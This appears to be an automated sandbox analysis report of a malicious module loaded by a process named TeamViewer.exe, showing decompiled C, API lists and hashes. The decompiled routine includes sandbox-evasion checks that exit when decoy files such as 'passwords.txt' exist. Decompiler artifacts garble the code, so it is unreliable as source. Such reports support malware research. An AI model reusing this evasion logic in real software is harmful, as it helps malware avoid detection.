                                                                                                                        Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 54%
                                                                                                                        			E004057B2(CHAR* __eax, intOrPtr _a8) {
				CHAR* _v0;
				CHAR* _t8;
				void* _t9;
				CHAR* _t13;
				CHAR* _t14;

				_t8 = __eax;
				_push(_a8);
				L00405B7C();
				_t13 = __eax;
				_t14 = _v0;
				while(1) {
					_push(_t14);
					L00405B7C();
					if(_t8 < _t13) {
						break;
					}
					 *(_t13 + _t14) =  *(_t13 + _t14) & 0x00000000;
					_t9 =  *0x4070f0(_t14, _v0);
					if(_t9 == 0) {
						return _t14;
					}
					_t8 = CharNextA(_t14);
					_t14 = _t8;
				}
				return 0;
			}








                                                                                                                        0x004057b2
                                                                                                                        0x004057b5
                                                                                                                        0x004057b9
                                                                                                                        0x004057be
                                                                                                                        0x004057c0
                                                                                                                        0x004057e8
                                                                                                                        0x004057e8
                                                                                                                        0x004057e9
                                                                                                                        0x004057f0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004057cd
                                                                                                                        0x004057d2
                                                                                                                        0x004057dd
                                                                                                                        0x00000000
                                                                                                                        0x004057fa
                                                                                                                        0x004057e0
                                                                                                                        0x004057e6
                                                                                                                        0x004057e6
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                        • lstrcmpi.KERNEL32 ref: 004057D2
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                        • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                                        • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                        • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Analysis Process: TeamViewer.exe PID: 6952 Parent PID: 6880 TeamViewer.exeCOMMON

                                                                                                                        Executed Functions

                                                                                                                        Function 6F338510, Relevance: 246.2, APIs: 122, Strings: 18, Instructions: 1164memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F338510(struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v268;
				char _v276;
				char _v284;
				char _v292;
				char _v524;
				char _v532;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v568;
				char _v576;
				char _v584;
				int _v588;
				char _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				int _v604;
				char* _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				int _v620;
				char* _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				int _v636;
				char* _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				int _v652;
				char* _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				int _v668;
				char* _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				int _v684;
				char* _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				int _v700;
				char* _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				int _v716;
				char* _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				int _v732;
				char* _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				int _v748;
				char* _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				int _v764;
				char* _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				int _v780;
				char* _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				int _v796;
				char* _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				int _v812;
				char* _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				int _v828;
				char* _v832;
				short _v836;
				intOrPtr _v840;
				long _v844;
				char* _v848;
				char _v852;
				long _v856;
				void _v860;
				char _v868;
				long _v872;
				intOrPtr _v888;
				int _v908;
				char* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				int _v924;
				char* _v928;
				void* _v932;
				char _v936;
				char _v937;
				char _v938;
				short _v939;
				void* _v940;
				char _v944;
				char _v945;
				short _v947;
				void* _v948;
				char _v952;
				void* _v956;
				char _v960;
				short _v962;
				short _v964;
				short _v966;
				char _v968;
				short _v970;
				char _v972;
				short _v974;
				short _v976;
				int _v980;
				signed int _v984;
				signed int _v992;
				intOrPtr _t262;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				struct HINSTANCE__* _t277;
				struct HINSTANCE__* _t278;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t280;
				struct HINSTANCE__* _t281;
				struct HINSTANCE__* _t282;
				struct HINSTANCE__* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				CHAR* _t343;
				CHAR* _t347;
				void* _t350;
				void* _t351;
				void* _t352;
				CHAR* _t355;
				void* _t357;
				CHAR* _t359;
				long _t360;
				char* _t362;
				void* _t363;
				intOrPtr _t365;
				char _t366;
				WCHAR* _t369;
				void* _t371;
				CHAR* _t373;
				intOrPtr _t375;
				CHAR* _t390;
				CHAR* _t400;
				void* _t403;
				signed int _t404;
				int _t407;
				char _t408;
				struct HINSTANCE__* _t410;
				intOrPtr _t413;
				void* _t415;
				struct HINSTANCE__* _t420;
				long _t423;
				void* _t424;
				struct HINSTANCE__* _t427;
				void* _t428;
				struct HINSTANCE__* _t431;
				void* _t432;
				char _t433;
				struct HINSTANCE__* _t435;
				void* _t436;
				char _t437;
				struct HINSTANCE__* _t439;
				void* _t441;
				struct HINSTANCE__* _t446;
				void* _t447;
				struct HINSTANCE__* _t450;
				intOrPtr _t451;
				intOrPtr _t463;
				char* _t464;
				struct HWND__* _t466;
				struct HWND__* _t468;
				char _t470;
				intOrPtr* _t476;
				char* _t477;
				int _t478;
				void* _t480;
				void* _t481;
				int _t483;
				short* _t484;
				long _t489;
				long _t493;
				char* _t502;
				int _t503;
				char* _t504;
				char _t505;
				WCHAR* _t507;
				void* _t509;
				CHAR* _t511;
				char _t512;
				char _t514;
				char _t515;
				char _t531;
				void* _t541;
				void* _t543;
				char* _t544;
				char* _t546;
				char _t548;
				void* _t549;
				CHAR* _t552;
				CHAR* _t553;
				char _t560;
				char _t561;
				intOrPtr _t568;
				intOrPtr _t575;
				void* _t576;
				void* _t589;
				signed int _t591;
				void* _t592;
				signed int _t596;
				void** _t598;
				intOrPtr* _t601;
				void* _t605;
				struct HINSTANCE__* _t606;
				void* _t611;
				void* _t613;
				void* _t618;
				void* _t621;
				void* _t622;
				void* _t623;
				void* _t624;
				void* _t625;
				void* _t626;
				void* _t627;
				void* _t628;
				void* _t632;
				void* _t633;

				_t262 = _a8;
				if(_t262 == 0) {
					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
					__eflags = _t263;
					if(_t263 != 0) {
						HeapFree(GetProcessHeap(), 0, _t263);
					}
					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
					__eflags = _t264;
					if(_t264 != 0) {
						HeapFree(GetProcessHeap(), 0, _t264);
					}
					_t265 = M6F340520; // 0x996738
					__eflags = _t265;
					if(_t265 != 0) {
						HeapFree(GetProcessHeap(), 0, _t265);
					}
					_t266 = M6F340524; // 0x9954b0
					__eflags = _t266;
					if(_t266 != 0) {
						HeapFree(GetProcessHeap(), 0, _t266);
					}
					_t267 = M6F340528; // 0x9773e8
					__eflags = _t267;
					if(_t267 != 0) {
						HeapFree(GetProcessHeap(), 0, _t267);
					}
					_t268 = M6F340530; // 0x997378
					__eflags = _t268;
					if(_t268 != 0) {
						HeapFree(GetProcessHeap(), 0, _t268);
					}
					_t269 = M6F340534; // 0x98a1a0
					__eflags = _t269;
					if(_t269 != 0) {
						HeapFree(GetProcessHeap(), 0, _t269);
					}
					_t270 = M6F3404F8; // 0x99b7a8
					__eflags = _t270;
					if(_t270 != 0) {
						HeapFree(GetProcessHeap(), 0, _t270);
					}
					_t271 = M6F340504; // 0x99ec68
					__eflags = _t271;
					if(_t271 != 0) {
						HeapFree(GetProcessHeap(), 0, _t271);
					}
					_t272 = M6F3404F4; // 0x99b258
					__eflags = _t272;
					if(_t272 != 0) {
						HeapFree(GetProcessHeap(), 0, _t272);
					}
					_t273 = M6F340500; // 0x977288
					__eflags = _t273;
					if(_t273 != 0) {
						HeapFree(GetProcessHeap(), 0, _t273);
					}
					_t274 = M6F3404CC; // 0x99d818
					__eflags = _t274;
					if(_t274 != 0) {
						HeapFree(GetProcessHeap(), 0, _t274);
					}
					_t275 = M6F3404D0; // 0x98a4d0
					__eflags = _t275;
					if(_t275 != 0) {
						HeapFree(GetProcessHeap(), 0, _t275);
					}
					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
					if(__eflags != 0) {
						_t277 = M6F3404A8; // 0x6f240000
						__eflags = _t277;
						if(_t277 != 0) {
							FreeLibrary(_t277);
						}
						_t278 = M6F340490; // 0x770a0000
						__eflags = _t278;
						if(_t278 != 0) {
							FreeLibrary(_t278);
						}
						_t279 = M6F340494; // 0x748e0000
						__eflags = _t279;
						if(_t279 != 0) {
							FreeLibrary(_t279);
						}
						_t280 = M6F340498; // 0x76130000
						__eflags = _t280;
						if(_t280 != 0) {
							FreeLibrary(_t280);
						}
						_t281 = M6F34049C; // 0x73c30000
						__eflags = _t281;
						if(_t281 != 0) {
							FreeLibrary(_t281);
						}
						_t282 = M6F3404A0; // 0x773a0000
						__eflags = _t282;
						if(_t282 != 0) {
							FreeLibrary(_t282);
						}
						_t283 = M6F3404A4; // 0x70950000
						__eflags = _t283;
						if(_t283 != 0) {
							FreeLibrary(_t283);
						}
						_t284 =  *0x6f34047c; // 0x998bd0
						__eflags = _t284;
						if(_t284 != 0) {
							HeapFree(GetProcessHeap(), 0, _t284);
						}
						_t285 = M6F3404D4; // 0x988bb8
						__eflags = _t285;
						if(_t285 != 0) {
							HeapFree(GetProcessHeap(), 0, _t285);
						}
						_t286 = M6F3404DC; // 0x99b1c8
						__eflags = _t286;
						if(_t286 != 0) {
							HeapFree(GetProcessHeap(), 0, _t286);
						}
						_t287 = M6F3404D8; // 0x99b240
						__eflags = _t287;
						if(_t287 != 0) {
							HeapFree(GetProcessHeap(), 0, _t287);
						}
						_t288 = M6F3404F0; // 0x998d58
						__eflags = _t288;
						if(_t288 != 0) {
							LocalFree(_t288);
						}
						__eflags = M6F340614 - 2;
						if(M6F340614 == 2) {
							E6F33B840(0);
						}
						__eflags = M6F340614; // 0x2
						if(__eflags > 0) {
							E6F33B510();
						}
						_t598 = 0x6f34046c;
						do {
							_t289 =  *_t598;
							__eflags = _t289;
							if(_t289 != 0) {
								CloseHandle(_t289);
							}
							_t598 =  &(_t598[1]);
							__eflags = _t598 - 0x6f340478;
						} while (_t598 < 0x6f340478);
						_t290 = M6F340510; // 0x0
						__eflags = _t290;
						if(_t290 != 0) {
							NtTerminateThread(_t290, 0);
							_t541 = M6F340510; // 0x0
							CloseHandle(_t541);
						}
					}
					goto L131;
				} else {
					if(_t262 != 1) {
						L131:
						return 1;
					} else {
						DisableThreadLibraryCalls(_a4);
						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
						_v928 = 0;
						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
							ExitProcess(0);
						}
						_t502 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
						PathAddBackslashA(_t502); // executed
						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
						M6F34052C = GetModuleFileNameA(_a4, _t347, 0x104);
						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						_t503 = M6F34052C; // 0x33
						_t543 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
						M6F340524 = _t350;
						RtlMoveMemory(_t350, _t543, _t503);
						_t351 = M6F340524; // 0x9954b0
						_t352 = E6F33A360(_t351, 0, 0);
						_t504 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
						M6F340528 = _t352;
						PathRemoveFileSpecA(_t504);
						_t544 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
						PathAddBackslashA(_t544);
						_t355 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
						SetCurrentDirectoryA(_t355);
						_t505 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
						_t357 = E6F33A360(_t505, 0, 0);
						_t611 =  &_v936 + 0x18;
						M6F340520 = _t357; // executed
						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
						if(_t357 != 0) {
							PathAddBackslashA( &_v292);
							_v948 = 0x626f6f66;
							_v944 = 0x6a2e7261;
							_v940 = 0x6770;
							_v938 = 0;
							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
							_t633 = _t611 + 0x10;
							_t489 = GetFileAttributesA( &_v548); // executed
							if(_t489 != 0xffffffff) {
								ExitProcess(0);
							}
							_v956 = 0x74646f2e;
							_v952 = 0;
							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
							_t611 = _t633 + 0x14;
							_t493 = GetFileAttributesA( &_v540); // executed
							if(_t493 != 0xffffffff) {
								_v947 = 0x7472;
								_v945 = 0x66;
								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
								_t611 = _t611 + 0x14;
								if(GetFileAttributesA( &_v532) != 0xffffffff) {
									_v844 = 0x73736170;
									_v840 = 0x64726f77;
									_v836 = 0x73;
									_v939 = 0x7874;
									_v937 = 0x74;
									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
									_t611 = _t611 + 0x14;
									if(GetFileAttributesA( &_v524) == 0xffffffff) {
										goto L11;
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						L11:
